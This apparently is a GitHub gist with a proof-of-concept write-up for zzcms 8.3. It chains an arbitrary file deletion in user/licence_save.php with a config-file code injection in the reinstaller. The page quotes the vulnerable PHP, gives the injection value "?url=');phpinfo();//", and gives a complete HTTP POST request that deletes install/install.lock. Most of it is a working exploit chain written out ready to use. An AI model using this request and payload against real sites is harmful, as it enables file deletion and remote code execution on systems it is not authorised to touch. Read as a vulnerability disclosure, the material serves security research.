Skip to content

Instantly share code, notes, and snippets.

@Lz1y

Lz1y/zzcms_File_Delete_to_Code_Execution_2.md Secret

Last active August 24, 2018 11:54
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Lz1y/e82eb9cc776e629b9d1874dc689421eb to your computer and use it in GitHub Desktop.
Save Lz1y/e82eb9cc776e629b9d1874dc689421eb to your computer and use it in GitHub Desktop.
Download ZIP
zzcms_File_Delete_to_Code_Execution_2
Raw
zzcms_File_Delete_to_Code_Execution_2.md

zzcms_File_Delete_to_Code_Execution_2

PoC by Lz1y

ZZCMS the lastest version download page :

http://www.zzcms.net/about/6.htm

zip installer:

http://www.zzcms.net/download/zzcms8.3.zip

vulnerability code:

in file user/licence_save.php,line 15-42

<?php
if( isset($_GET["page"]) && $_GET["page"]!="") {$page=$_GET['page'];}else{$page=1;}
checkid($page,0);
$title=trim($_POST["title"]);
$img=trim($_POST["img"]);
if ($_GET["action"]=="add"){
query("Insert into zzcms_licence(title,img,editor,sendtime) values('$title','$img','$username','".date('Y-m-d H:i:s')."')") ;
}elseif ($_GET["action"]=="modify"){
$oldimg=trim($_POST["oldimg"]);
$id=$_POST["id"];
if ($id=="" || is_numeric($id)==false){
$FoundErr=1;
$ErrMsg="<li>". $f_array[0]."</li>";
WriteErrMsg($ErrMsg);
}else{
query("update zzcms_licence set title='$title',img='$img',sendtime='".date('Y-m-d H:i:s')."',passed=0 where id='$id'");
if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
$f="../".$oldimg;
if (file_exists($f)){
unlink($f);
}
$fs="../".str_replace(".","_small.",$oldimg)."";
if (file_exists($fs)){
unlink($fs);
}
}
}
}

When action($_GET["action"]) is "modify", $oldimg($_POST["oldimg"]) can be any file,attacker can delete any file like /install/install.lock, then let's see the code in /install/index.php:

<?php 
session_cache_limiter('private, must-revalidate');  //为了支持返回上一步页面回跳,//要放在session_start之前
if(!isset($_SESSION)){session_start();} 
//error_reporting(0);
//set_magic_quotes_runtime(0);//5.3后已不在支持
include '../inc/config.php';
include 'conn.php';
if($_POST) extract($_POST, EXTR_SKIP);//把数组中的键名直接注册为了变量。就像把$_POST[ai]直接注册为了$ai。
if($_GET) extract($_GET, EXTR_SKIP);
$submit = isset($_POST['submit']) ? true : false;
$step = isset($_POST['step']) ? $_POST['step'] : 1;

...
#line 105-116
		$fp="../inc/config.php";
		$f = fopen($fp,'r');
		$str = fread($f,filesize($fp));
		fclose($f);
		$str=str_replace("define('sqlhost','".sqlhost."')","define('sqlhost','$db_host')",$str) ;
		$str=str_replace("define('sqlport','".sqlport."')","define('sqlport','$db_port')",$str) ;
		$str=str_replace("define('sqldb','".sqldb."')","define('sqldb','$db_name')",$str) ;
		$str=str_replace("define('sqluser','".sqluser."')","define('sqluser','$db_user')",$str) ;
		$str=str_replace("define('sqlpwd','".sqlpwd."')","define('sqlpwd','$db_pass')",$str) ;
		$str=str_replace("define('siteurl','".siteurl."')","define('siteurl','$url')",$str) ;
		$str=str_replace("define('logourl','".logourl."')","define('logourl','$url/image/logo.png')",$str) ;
		$f=fopen($fp,"w+");//fopen()的其它开关请参看相关函数
...

because if($_GET) extract($_GET, EXTR_SKIP);,$url param bring code inject,like ?url=');phpinfo();//

So,there is a code execution by delete file.

POC:

POST /user/licence_save.php?action=modify HTTP/1.1
Host: lzy.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Cookie: PHPSESSID=; XDEBUG_SESSION=PHPSTORM
Connection: close
Upgrade-Insecure-Requests: 1

id=1&oldimg=install/install.lock
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment